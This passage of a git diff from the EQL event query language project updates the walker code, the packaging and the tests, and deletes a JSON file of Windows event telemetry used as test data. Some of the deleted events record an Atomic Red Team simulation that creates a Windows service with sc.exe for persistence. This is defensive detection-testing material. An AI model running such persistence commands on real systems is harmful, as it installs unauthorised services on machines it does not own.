[self.walk(v, *args, **kwargs) for name, v in node.iter_slots()] + node = type(node)(*slots) + return method(node, *args, **kwargs) + + def copy_node(self, node): + """Create a copy of a node.""" + return RecursiveWalker().walk(node) + + +class ConfigurableWalker(RecursiveWalker): + """Subclass for adding configurations to an walkers.""" + + def __init__(self, config=None): + """Create the walker with optional configuration.""" + self.config = config or {} + self.stack = [] + self.time_unit = self.get_config('time_unit', DEFAULT_TIME_UNIT) # type: int + self._schema = None + + if self.get_config('schema', None) is not None: + self._schema = Schema(**self.get_config('schema')) + super(ConfigurableWalker, self).__init__() + + @property + def schema(self): + """Get the current engine schema.""" + if self._schema is None: + return Schema.current() + return self._schema + + def get_config(self, name, default=None): + """Get a property from the config dict.""" + return self.config.get(name, default) + + +# circular dependency +from .ast import BaseNode, EventQuery # noqa: E402 diff --git a/requirements.txt b/requirements.txt index ba151ba..5ac1014 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,2 +1 @@ -TatSu~=4.2.6 -PyYAML~=3.13 +TatSu==4.2.6 diff --git a/requirements_test.txt b/requirements_test.txt index 06ec797..711d202 100644 --- a/requirements_test.txt +++ b/requirements_test.txt @@ -1,6 +1,8 @@ mock>=1.3.0 -pytest==3.8.2 +pytest~=3.8.2 pytest-cov~=2.4 -flake8==2.5.1 -pep257==0.7.0 -flake8-pep257==1.0.5 +flake8~=2.5.1 +pep257~=0.7.0 +flake8-pep257~=1.0.5 +PyYAML +toml~=0.10 \ No newline at end of file diff --git a/setup.cfg b/setup.cfg index f15eac5..9ede65e 100644 --- a/setup.cfg +++ b/setup.cfg @@ -3,10 +3,11 @@ universal = 1 [flake8] max-line-length = 120 -max-complexity = 20 +max-complexity = 23 +exclude = eql/_parsergen.py [pep257] ignore = D203 [tool:pytest] -#addopts = --cov=eql --cov-report term-missing --cov-report=xml +addopts = --cov=eql --cov-report term-missing --cov-report=xml --cov-report=html --junitxml=junit.xml -x -v diff --git a/setup.py b/setup.py index c02477f..487d919 100644 --- a/setup.py +++ b/setup.py @@ -12,20 +12,21 @@ except ImportError: # for pip <= 9.0.3 from pip.req import parse_requirements -from setuptools import setup, Command, find_packages +from setuptools import setup, Command from setuptools.command.test import test as TestCommand with io.open('eql/__init__.py', 'rt', encoding='utf8') as f: __version__ = re.search(r'__version__ = \'(.*?)\'', f.read()).group(1) - install_requires = parse_requirements('requirements.txt', session=False) install_requires = [str(req.req) for req in install_requires] test_requires = parse_requirements('requirements_test.txt', session=False) test_requires = [str(req.req) for req in test_requires] +etc_files = [os.path.relpath(fn, 'eql') for fn in glob.glob('eql/etc/*') if not fn.endswith('.py')] + class Lint(Command): """Wrapper for the standard linters.""" @@ -53,32 +54,45 @@ def run(self): class Test(TestCommand): """Use pytest (http://pytest.org/latest/) in place of the standard unittest library.""" + user_options = [("pytest-args=", "a", "Arguments to pass to pytest")] + def initialize_options(self): """Need to ensure pytest_args exists.""" TestCommand.initialize_options(self) self.pytest_args = [] - def finalize_options(self): - """Zero test_args and force test_suite to run.""" - TestCommand.finalize_options(self) - self.test_args = [ - '--cov-report=xml', '--cov-report=html', '--cov=eql', '--junitxml=junit.xml', '-x', '-v' - ] - self.test_suite = True - def run_tests(self): """Run pytest.""" import pytest - sys.exit(pytest.main(self.test_args)) + sys.exit(pytest.main(self.pytest_args)) -etc_files = [os.path.relpath(fn, 'eql') for fn in glob.glob('eql/etc/*') if not fn.endswith('.py')] - setup( name='eql', version=__version__, description='Event Query Language', install_requires=install_requires, + author='Endgame, Inc.', + author_email='eql@endgame.com', + license='AGPLv3', + classifiers=[ + 'Intended Audience :: Developers', + 'Intended Audience :: Information Technology', + 'Intended Audience :: Science/Research', + 'Intended Audience :: System Administrators', + 'Natural Language :: English', + 'Programming Language :: Python :: 2', + 'Programming Language :: Python :: 2.7', + 'Programming Language :: Python :: 3', + 'Programming Language :: Python :: 3.4', + 'Programming Language :: Python :: 3.5', + 'Programming Language :: Python :: 3.6', + 'Programming Language :: Python :: 3.7', + 'Topic :: Database', + 'Topic :: Internet :: Log Analysis', + 'Topic :: Scientific/Engineering :: Information Analysis', + ], + url='https://eql.readthedocs.io', tests_require=test_requires, cmdclass={ 'lint': Lint, @@ -88,16 +102,30 @@ def run_tests(self): 'console_scripts': [ 'eql=eql.main:main', ], + 'pygments.lexers': [ + 'eql=eql.highlighters:EqlLexer' + ] }, extras_require={ + 'docs': [ + 'sphinx', + 'sphinx_rtd_theme', + ], + 'cli': [ + 'pygments', + 'prompt_toolkit', + ], 'lint': test_requires, 'test': test_requires, 'loaders': [ 'pyyaml', 'toml', + ], + 'highlighters': [ + 'pygments', ] }, - packages=find_packages(), + packages=['eql', 'eql.tests', 'eql.etc'], package_data={ 'eql': etc_files, }, diff --git a/tests/test_ast.py b/tests/test_ast.py new file mode 100644 index 0000000..0c818b9 --- /dev/null +++ b/tests/test_ast.py @@ -0,0 +1,95 @@ +"""Test case.""" +import unittest + +from eql.ast import * # noqa: F403 +from eql.pipes import * # noqa: F403 +from eql.parser import ( + parse_expression +) +from eql.walkers import Walker, RecursiveWalker + + +class TestAbstractSyntaxTree(unittest.TestCase): + """Test EQL parsing.""" + + def test_abstract_methods(self): + """Test that abstract methods are raising exceptions.""" + node = EqlNode() + self.assertRaises(NotImplementedError, node.render) + + macro = BaseMacro("name") + self.assertRaises(NotImplementedError, macro.expand, []) + + def test_invalid_ast(self): + """Test that invalid ast nodes raise errors.""" + self.assertRaises(TypeError, Literal, True) + self.assertRaises(TypeError, Literal, dict()) + self.assertRaises(TypeError, Literal, list()) + self.assertRaises(TypeError, Literal, complex()) + self.assertRaises(TypeError, Literal, object()) + self.assertRaises(TypeError, Literal, lambda: None) + self.assertRaises(TypeError, Literal, object) + + def test_literals(self): + """Test that literals are parsed correctly.""" + eql_literals = [ + ('true', True, Boolean), + ('false', False, Boolean), + ('100', 100, Number), + ('1.5', 1.5, Number), + ('.6', .6, Number), + ('-100', -100, Number), + ('-15.24', -15.24, Number), + ('"100"', "100", String), + ('null', None, Null), + ] + for text, expected_value, expected_type in eql_literals: + node = parse_expression(text) + rendered = node.render() + re_parsed = parse_expression(rendered) + self.assertIsInstance(node, expected_type) + self.assertEqual(node.value, expected_value) + self.assertEqual(node, re_parsed) + + def test_camelized(self): + """Test camelization of class names.""" + camelized = Walker.camelized + self.assertEqual(camelized(String), "string") + self.assertEqual(camelized(EventQuery), "event_query") + self.assertEqual(camelized(EventQuery), "event_query") + self.assertEqual(camelized(EventQuery), "event_query") + self.assertEqual(camelized(FunctionCall), "function_call") + self.assertEqual(camelized(PipeCommand), "pipe_command") + self.assertEqual(camelized(UniqueCountPipe), "unique_count_pipe") + + def test_walker(self): + """Check that walker transformation works properly.""" + walker = RecursiveWalker() + node = parse_expression("process_name == 'net.exe' or file_name == 'abc.txt'") + + def assert_deep_copy(a, b): + """Check that deep copies are created.""" + self.assertEqual(a, b) + self.assertIsNot(a, b) + + for deep_a, deep_b in zip(a, b): + self.assertEqual(deep_a, deep_b) + self.assertIsNot(deep_a, deep_b) + + assert_deep_copy(node, walker.copy_node(node)) + + class SimpleWalker(RecursiveWalker): + + def _walk_comparison(self, node): + if node.left == Field('file_name'): + return self.walk(parse_expression('user_name == "TEMP_USER"')) + return self._walk_base_node(node) + + def _walk_string(self, node): + if node == String("TEMP_USER"): + return String("artemis") + return node + + walker = SimpleWalker() + expected = parse_expression('process_name == "net.exe" or user_name == "artemis"') + self.assertEqual(walker.walk(node), expected) diff --git a/tests/test_cli.py b/tests/test_cli.py index 3a83da9..2cf1a3e 100644 --- a/tests/test_cli.py +++ b/tests/test_cli.py @@ -3,17 +3,18 @@ import json import os import uuid +import unittest import mock -from .base import TestEngine -from eql.errors import SchemaError +from eql.errors import EqlSchemaError from eql.loader import save_analytics -from eql.main import main +from eql.main import main, BANNER, shell_main from eql.parser import parse_analytics -from eql.schema import use_schema -from eql.utils import save_dump - +from eql.schema import Schema +from eql.tests import TestEngine, EVENTS_FILE +from eql.table import Table +from eql.utils import save_dump, to_unicode build_analytics = parse_analytics([ {'query': "process where a == b", 'metadata': {'id': str(uuid.uuid4())}}, @@ -27,7 +28,7 @@ def stdin_patch(): return io.StringIO(u'\n'.join([json.dumps(event.data) for event in TestEngine.get_events()])) -class TestEqlCommand(TestEngine): +class TestEqlCommand(unittest.TestCase): """Test EQL command line parsing and functionality.""" @mock.patch('sys.stdout') @@ -46,48 +47,46 @@ def test_incomplete_args(self, mock_stdout, mock_stderr): @mock.patch('argparse.ArgumentParser.error') def test_engine_config(self, mock_error): """Test building an engine with a custom config.""" - schema = {'event_types': {'magic': 543212345}} + schema = {'magic': {"expected_field": "string"}} target_file = os.path.abspath('analytics-saved.tmp.json') analytics_file = os.path.abspath('analytics.tmp.json') config_file = os.path.abspath('config.tmp.json') - with use_schema(schema): - analytics = parse_analytics([{'query': "magic where true", 'metadata': {'id': str(uuid.uuid4())}}]) - save_analytics(analytics, analytics_file) - with open(analytics_file, 'r') as f: - expected_contents = f.read() - - save_dump({'schema': schema}, config_file) + if os.path.exists(target_file): + os.remove(target_file) - main(['build', analytics_file, target_file, '--config', config_file, '--analytics-only']) + analytics = parse_analytics([ + {'query': "magic where actual_field = true", 'metadata': {'id': str(uuid.uuid4())}}, + ]) + save_analytics(analytics, analytics_file) + save_dump({'schema': {"events": schema}, "allow_any": False}, config_file) - with open(target_file, 'r') as f: - actual_contents = f.read() + with self.assertRaises(EqlSchemaError): + main(['build', analytics_file, target_file, '--config', config_file, '--analytics-only']) - self.assertEqual(actual_contents, expected_contents) + self.assertFalse(os.path.exists(target_file)) os.remove(config_file) - os.remove(target_file) os.remove(analytics_file) - def test_engine_schema_failure(self): + def test_engine_schema_implied(self): """Test building an engine with a custom config.""" - schema = {'event_types': {'magic': 543212345}} + schema = {'magic': {}} target_file = os.path.abspath('analytics-saved.tmp.json') analytics_file = os.path.abspath('analytics.tmp.json') - with use_schema(schema): + with Schema(schema): analytics = parse_analytics([{'query': "magic where true", 'metadata': {'id': str(uuid.uuid4())}}]) save_analytics(analytics, analytics_file) - with self.assertRaises(SchemaError): - main(['build', analytics_file, target_file]) + main(['build', analytics_file, target_file]) os.remove(analytics_file) + os.remove(target_file) - @mock.patch('eql.engines.native.PythonEngine.print_event') + @mock.patch('eql.PythonEngine.print_event') @mock.patch('sys.stdin', new=stdin_patch()) def test_query_eql_stdin(self, mock_print_event): """Stream stdin to the EQL command.""" @@ -98,7 +97,7 @@ def test_query_eql_stdin(self, mock_print_event): actual_event_ids = [args[0][0].data['serial_event_id'] for args in mock_print_event.call_args_list] self.assertEqual(expected, actual_event_ids, "Event IDs didn't match expected.") - @mock.patch('eql.engines.native.PythonEngine.print_event') + @mock.patch('eql.PythonEngine.print_event') @mock.patch('sys.stdin', new=stdin_patch()) def test_implied_any(self, mock_print_event): """Stream stdin to the EQL command.""" @@ -109,7 +108,7 @@ def test_implied_any(self, mock_print_event): actual_event_ids = [args[0][0].data['serial_event_id'] for args in mock_print_event.call_args_list] self.assertEqual(expected, actual_event_ids, "Event IDs didn't match expected.") - @mock.patch('eql.engines.native.PythonEngine.print_event') + @mock.patch('eql.PythonEngine.print_event') @mock.patch('sys.stdin', new=stdin_patch()) def test_implied_base(self, mock_print_event): """Stream stdin to the EQL command.""" @@ -120,22 +119,56 @@ def test_implied_base(self, mock_print_event): actual_event_ids = [args[0][0].data['serial_event_id'] for args in mock_print_event.call_args_list] self.assertEqual(expected, actual_event_ids, "Event IDs didn't match expected.") - @mock.patch('eql.engines.native.PythonEngine.print_event') + @mock.patch('eql.PythonEngine.print_event') def test_query_eql_json(self, mock_print_event): """Test file I/O with EQL.""" query = "process where true | head 8 | tail 1" - main(['query', query, '-f', self.EVENTS_FILE]) + main(['query', query, '-f', TestEngine.events_file]) expected = [8] actual_event_ids = [args[0][0].data['serial_event_id'] for args in mock_print_event.call_args_list] self.assertEqual(expected, actual_event_ids, "Event IDs didn't match expected.") - @mock.patch('eql.engines.native.PythonEngine.print_event') + @mock.patch('eql.PythonEngine.print_event') def test_query_eql_jsonl(self, mock_print_event): """Test file I/O with EQL.""" query = "process where true | head 8 | tail 1" - main(['query', query, '-f', self.EVENTS_FILE]) + main(['query', query, '-f', TestEngine.events_file]) expected = [8] actual_event_ids = [args[0][0].data['serial_event_id'] for args in mock_print_event.call_args_list] self.assertEqual(expected, actual_event_ids, "Event IDs didn't match expected.") + + # TODO: Fix this test so it actually works + def _test_interactive_shell(self): + """Test that commands can be executed via the interactive shell.""" + class Arguments(object): + config = None + file = None + + actual_stdin = io.StringIO(to_unicode("\n".join([ + "input %s" % EVENTS_FILE, + "table process_path parent_process_path", + "search\nprocess where serial_event_id in (32, 33);", + ]))) + + expected_stdout_text = "\n".join([ + BANNER, + "eql> input %s" % EVENTS_FILE, + "Using file %s with %d events" % (EVENTS_FILE, len(TestEngine.get_events())), + "eql> table process_path parent_process_path", + "eql> search process where serial_event_id in (32, 33)", + Table([ + ["C:\\Windows\\System32\\sppsvc.exe", "C:\\Windows\\System32\\services.exe"], + ["C:\\Windows\\System32\\dwm.exe", "C:\\Windows\\System32\\svchost.exe"] + ], names=["process_path", "parent_process_path"]).__unicode__() + ]) + + actual_stdout = [] + + # Now actually run with redirected stdout and stdin + with mock.patch('sys.stdin', new=actual_stdin): + shell_main(Arguments()) + + actual_stdout_lines = "\n".join(actual_stdout).splitlines() + self.assertListEqual(actual_stdout_lines, expected_stdout_text.splitlines()) diff --git a/tests/test_data.json b/tests/test_data.json deleted file mode 100644 index 71fa9ea..0000000 --- a/tests/test_data.json +++ /dev/null @@ -1,159600 +0,0 @@ -[ - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883570659490000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000050566", - "registry_value": "W32:0000000000050566", - "timestamp": 131883570659490000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000050566", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000050566\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883570659490000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883570670110000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883570670270000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883570685280000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883570685430000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883570685430000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883570685430000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000080582", - "registry_value": "W32:0000000000080582", - "timestamp": 131883570686060016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000080582", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000080582\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883570686060016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 1500, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "subtype": "terminate", - "timestamp": 131883570696220000, - "unique_pid": "{42FC7E13-C965-5C05-0000-001028424901}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883570715590000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883570715590000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570715590000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570715590000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570715590000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570715590000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570715590000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1480, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570844660000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1480, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1480, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1480, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1480, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8148, - "ppid": 1480, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "create", - "timestamp": 131883570844800000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}", - "unique_ppid": "{42FC7E13-CADC-5C05-0000-001074C14C01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 